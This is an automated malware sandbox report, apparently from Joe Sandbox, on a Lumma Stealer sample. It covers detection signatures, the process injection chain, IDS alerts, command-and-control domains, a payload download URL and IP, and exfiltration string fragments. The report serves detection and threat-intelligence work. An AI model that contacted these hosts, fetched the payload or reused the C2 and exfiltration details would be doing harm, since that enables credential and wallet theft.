
Windows Analysis Report
ZjH6H6xqo7.exe

Overview

General Information

Sample name: ZjH6H6xqo7.exe (renamed because original name is a hash value)
Original sample name: 16a1fbd21af85d43b1ac31bf1829a152.exe
Analysis ID: 1561755
MD5: 16a1fbd21af85d43b1ac31bf1829a152
SHA1: 522a835acc8ec09d9d74d695fb9ebaed3b2d72ff
SHA256: 36589e0ed1c8a584dc014add50db2f2ac1c5a0cfac5403f7b7886b66e26a1d86
Tags: exe, LummaStealer, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • ZjH6H6xqo7.exe (PID: 5452 cmdline: "C:\Users\user\Desktop\ZjH6H6xqo7.exe" MD5: 16A1FBD21AF85D43B1AC31BF1829A152)
    • csc.exe (PID: 6480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6781.tmp" "c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • RegAsm.exe (PID: 6392 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["300snails.sbs", "faintbl0w.sbs", "3xc1aimbl0w.sbs", "thicktoys.sbs"]}
Source: sslproxydump.pcap | Rule: JoeSecurity_LummaCStealer_3 | Description: Yara detected LummaC Stealer | Author: Joe Security
Source: Process Memory Space: ZjH6H6xqo7.exe PID: 5452 | Rule: JoeSecurity_AntiVM_3 | Description: Yara detected AntiVM_3 | Author: Joe Security
Source: decrypted.memstr | Rule: JoeSecurity_LummaCStealer_2 | Description: Yara detected LummaC Stealer | Author: Joe Security

        System Summary

        Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\ZjH6H6xqo7.exe", ParentImage: C:\Users\user\Desktop\ZjH6H6xqo7.exe, ParentProcessId: 5452, ParentProcessName: ZjH6H6xqo7.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", ProcessId: 6480, ProcessName: csc.exe
        Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\ZjH6H6xqo7.exe, ProcessId: 5452, TargetFilename: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline

        Data Obfuscation

        Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\ZjH6H6xqo7.exe", ParentImage: C:\Users\user\Desktop\ZjH6H6xqo7.exe, ParentProcessId: 5452, ParentProcessName: ZjH6H6xqo7.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", ProcessId: 6480, ProcessName: csc.exe
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-11-24T08:35:38.621322+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:40.735887+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:42.937475+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:44.950948+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:47.056522+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:49.322834+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:51.956377+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:55.574111+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49722 | 104.21.47.136 | 443 | TCP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-11-24T08:35:39.319394+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:41.446509+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:56.299081+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 104.21.47.136 | 443 | TCP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-11-24T08:35:39.319394+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.47.136 | 443 | TCP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-11-24T08:35:41.446509+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 104.21.47.136 | 443 | TCP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-11-24T08:35:38.621322+0100 | 2057671 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49705 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:40.735887+0100 | 2057671 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49706 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:42.937475+0100 | 2057671 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49707 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:44.950948+0100 | 2057671 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49708 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:47.056522+0100 | 2057671 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49709 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:49.322834+0100 | 2057671 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49710 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:51.956377+0100 | 2057671 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49711 | 104.21.47.136 | 443 | TCP
        2024-11-24T08:35:55.574111+0100 | 2057671 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49722 | 104.21.47.136 | 443 | TCP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-11-24T08:35:36.997805+0100 | 2057670 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 61746 | 1.1.1.1 | 53 | UDP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-11-24T08:35:50.066874+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 104.21.47.136 | 443 | TCP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-11-24T08:35:51.960983+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 104.21.47.136 | 443 | TCP


        AV Detection

        Source: ZjH6H6xqo7.exe | Avira: detected
        Source: https://sector-essay.cyou/api | Avira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/apij | Avira URL Cloud: Label: malware
        Source: http://147.45.44.131/infopage/tvh53.exe | Avira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/5 | Avira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/apiO | Avira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/apiC | Avira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/ | Avira URL Cloud: Label: malware
        Source: https://sector-essay.cyou:443/apiMicrosoft | Avira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/apie | Avira URL Cloud: Label: malware
        Source: https://sector-essay.cyou:443/api | Avira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll | Avira: detection malicious, Label: HEUR/AGEN.1300034
        Source: 5.2.RegAsm.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["300snails.sbs", "faintbl0w.sbs", "3xc1aimbl0w.sbs", "thicktoys.sbs"]}
        Source: ZjH6H6xqo7.exe | ReversingLabs: Detection: 71%
        Source: ZjH6H6xqo7.exe | Virustotal: Detection: 65%
        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll | Joe Sandbox ML: detected
        Source: ZjH6H6xqo7.exe | Joe Sandbox ML: detected
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: faintbl0w.sbs
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: 300snails.sbs
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: 3xc1aimbl0w.sbs
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: thicktoys.sbs
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004192C3 CryptUnprotectData | 5_2_004192C3
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49711 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49722 version: TLS 1.2
        Source: ZjH6H6xqo7.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.pdb source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 4C697C35h | 5_2_00441050
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edx], al | 5_2_0042E3BE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax] | 5_2_00441480
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+000000E8h] | 5_2_0040E4AF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-0CA2BA0Eh] | 5_2_0040CDB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+esi+04h] | 5_2_00423850
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-2FEE79D7h] | 5_2_0040D80D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], cl | 5_2_0042C81E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [esi+04h], eax | 5_2_0042E03F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h | 5_2_004268D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [ebx], dx | 5_2_00418890
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax+000001ADh] | 5_2_0041990C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esi+ecx+5F30FA22h] | 5_2_0040B1D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp eax | 5_2_004251D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 4C697C35h | 5_2_004411E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], bl | 5_2_004091B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movsx eax, byte ptr [esi] | 5_2_00440210
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, edx | 5_2_0041C225
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movsx eax, byte ptr [esi] | 5_2_004402F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, eax | 5_2_0041D330
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx eax, byte ptr [esi+edx+00000420h] | 5_2_0042C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], dl | 5_2_0042C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-5B418B08h] | 5_2_0043C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 5_2_0043C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, eax | 5_2_0041EB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [esi], ax | 5_2_0041EB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [esi], ax | 5_2_0041EB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-42FFC5DBh] | 5_2_0040D392
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp eax | 5_2_00425440
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 5_2_00435CC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 5_2_0042B4E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, eax | 5_2_00426C90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [esi+04h], eax | 5_2_0042ED09
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 5_2_0040AD20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [esi+04h], eax | 5_2_0042EDCA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp eax | 5_2_004255D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx eax, byte ptr [edi] | 5_2_0043FDE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movsx eax, byte ptr [esi] | 5_2_0043FDE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h | 5_2_004235F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [ebp-10h], edx | 5_2_00424DA1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebx, bx | 5_2_004255A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 32F24C0Bh | 5_2_0043BE60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-7269D38Fh] | 5_2_00418E83
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp dword ptr [00446898h] | 5_2_00419744
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [ecx], edi | 5_2_0040B769
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 9C142CDAh | 5_2_00440F70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 5_2_00441720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, ecx | 5_2_004077D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], al | 5_2_0041FF90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov edx, ecx | 5_2_0040C795
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h | 5_2_0043BFA0

        Networking

        Source: Network traffic | Suricata IDS: 2057670 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sector-essay .cyou) : 192.168.2.5:61746 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49711 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49710 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49705 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49709 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49706 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49708 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49722 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49707 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49711 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.47.136:443
        Source: Malware configuration extractor | URLs: 300snails.sbs
        Source: Malware configuration extractor | URLs: faintbl0w.sbs
        Source: Malware configuration extractor | URLs: 3xc1aimbl0w.sbs
        Source: Malware configuration extractor | URLs: thicktoys.sbs
        Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Sun, 24 Nov 2024 07:35:35 GMT | Server: Apache/2.4.52 (Ubuntu) | Last-Modified: Sat, 16 Nov 2024 15:59:10 GMT | ETag: "4ce00-62709c39a70e3" | Accept-Ranges: bytes | Content-Length: 314880 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdos-program
        Source: global traffic | HTTP traffic detected: GET /infopage/tvh53.exe HTTP/1.1 | X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq | Host: 147.45.44.131 | Connection: Keep-Alive
        Source: Joe Sandbox View | IP Address: 147.45.44.131 147.45.44.131
        Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.47.136:443
        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.47.136:443
